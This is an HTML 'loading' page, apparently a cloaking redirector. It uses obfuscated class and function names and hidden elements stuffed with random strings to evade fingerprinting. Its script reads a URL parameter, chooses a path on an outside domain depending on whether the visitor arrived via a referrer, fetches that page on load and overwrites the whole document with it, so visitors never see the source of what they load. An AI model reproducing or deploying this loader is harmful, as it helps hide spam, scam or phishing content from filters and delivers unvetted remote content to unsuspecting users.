<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ecbh2LwFu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ecbh2LwFu .BnPvnCAvEQo {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ecbh2LwFu .content {
            line-height: 50px;
            text-align: center
        }

        .ecbh2LwFu .img {
            width: 100%
        }

        .ecbh2LwFu .JlCYBoZI8 {
            text-align: center
        }

        .ecbh2LwFu .JlCYBoZI8 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ecbh2LwFu .JlCYBoZI8 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ecbh2LwFu .JlCYBoZI8 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ecbh2LwFu .JlCYBoZI8 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ecbh2LwFu .JlCYBoZI8 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ecbh2LwFu .JlCYBoZI8 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ecbh2LwFu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function AOqxoDNBkahKu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var miDZIjM = AOqxoDNBkahKu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ miDZIjM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ miDZIjM +".html?a=share";
		}
		
        mdCY4Tz=url+"#"+new Date().getTime();
        mdCY4Tz && function() {
            $.get(mdCY4Tz, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>QNQjxrWIpKwYgx2aUdVPNCEaoPPuw1rmVc0vu27h7gte7fimCjGpoLJwXubePdfTklss6c3OfSAPGXFoYs90kiz6oh7rc1FSaXt</p>
<li style='display:none' >ZdSJMb3ZZNvxCsJpJ8p8BPyZrTaSljHND1ZuAvpm2PcLCN0YQWDNPWuCN1UsFIq9moGs</li>
<b style='display:none' >QOWKc3mpYUYWbWh2SPyeC4ZcTYxbgrM77ruULWn8C7S2uy3y2XVQbh7MzbER9ltp5ARe07kGNXpce8cvVMrmnCemfaOk</b>
<img  src='' style='display:none'>
<ul style='display:none' >haZIN0dH6CIc6thVRdjs73xItyi0tBR5FeCubhV3z40QEOrmtZbKQyT7CT6TWbUp7M2</ul><div class="ecbh2LwFu">
    <div class="BnPvnCAvEQo">
        <div class="JlCYBoZI8">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>UhZ2XklZfypysgQ3ZayRqpjD131lIdUfRE0</p>
<h1 style='display:none' >HpBF4tdL204Gq4p4tcSr6NRd3esUM</h1>
<p  style='display:none'>UhZ2XklZfypysgQ3ZayRqpjD131lIdUfRE0</p>
<p  style='display:none'>UhZ2XklZfypysgQ3ZayRqpjD131lIdUfRE0</p>
<li style='display:none' >mTUy5GK7qRUFYtFfCUFXuosJXXH8wSMxKSyOf38Q6</li>
<p  style='display:none'>UhZ2XklZfypysgQ3ZayRqpjD131lIdUfRE0</p>
<h1 style='display:none' >HpBF4tdL204Gq4p4tcSr6NRd3esUM</h1>
<ul style='display:none' >VtrHjxCJbl7YXcdhatT5Scx2JFW0l8QaSyFsNhAKz2tMjGLsarDVnHu0AW18sBPLGqJA2jj80n8A3Uik</ul>
<ul style='display:none' >VtrHjxCJbl7YXcdhatT5Scx2JFW0l8QaSyFsNhAKz2tMjGLsarDVnHu0AW18sBPLGqJA2jj80n8A3Uik</ul></body>
</html>